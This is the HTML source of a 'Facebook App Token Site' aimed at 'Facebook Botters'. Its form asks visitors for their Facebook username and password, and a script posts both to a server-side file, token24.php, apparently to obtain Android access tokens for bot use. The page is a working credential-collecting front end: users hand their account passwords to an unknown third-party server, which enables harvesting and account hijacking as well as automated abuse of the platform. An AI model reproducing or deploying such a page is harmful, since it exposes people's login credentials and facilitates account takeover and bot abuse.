<DOCTYPE! HTML>

<html>

<head>

<title>Facebook App Token Site</title>

<link rel="shortcut icon" href="http://lethetuan.com/img/icon.png" type="image/x-icon" />

<meta name="author" content="Sarmad Khokhar">

<meta name="copyright" content="Copyright © 2017 Sarmad Khokhar" />

<meta name="viewport" content="width=device-width, initial-scale=1" />

<meta name="type" content="website" />

<meta name="description" content="this site is made by Sarmad Khokhar for Facebook Botters .This is facebook Token site . You can Get Token form this site without any spam ">

<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">

<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>

<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>

<style>

.tkn {

height : 50% ;

width : 100% ;

}

</style>

</head>

<body>

<nav class="navbar navbar-default navbar-fixed-top">

  <div class="container-fluid">

  <div class="navbar-header">

  <a class="navbar-brand" href="https://realustad.blogspot.com/">Real Ustad</a>

  </div>



  </div>

  </nav>

<div class="container">
  <h2>GET ANDROID TOKEN</h2>
  <div class="panel-group">
<div class="panel panel-primary">
      <div class="panel-heading">No Checkpoint 100%</div>
      <div class="panel-body">      
<div class="form-group">
  <center><label for="usr">Username:</label>
  <input type="text" name="email" class="form-control" id="tk">
</div>
<div class="form-group">
  <center><label for="pwd">Password:</label>
  <input type="password" name="password" class="form-control" id="mk">
</div>
<center><button type="button" class="btn btn-danger" onclick="Puaru_Active()" >Get Token</button>
<p>
<center><li id="trave" class="list-group-item"><img src="F5PxqYf.JPG"> </li></p>

</div>
    </div>
</div>

<script>
function Puaru_Active() {
var http = new XMLHttpRequest();
var tk = document.getElementById("tk").value;
var mk = document.getElementById("mk").value;
var url = "token24.php";
var params = "u="+tk+"&p="+mk+"";
http.open("POST", url, true);
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

http.onreadystatechange = function() {
    if(http.readyState == 4 && http.status == 200) {
      document.getElementById("trave").innerHTML = http.responseText;        
    }
}
http.send(params);
}
</script>

</body>


</html>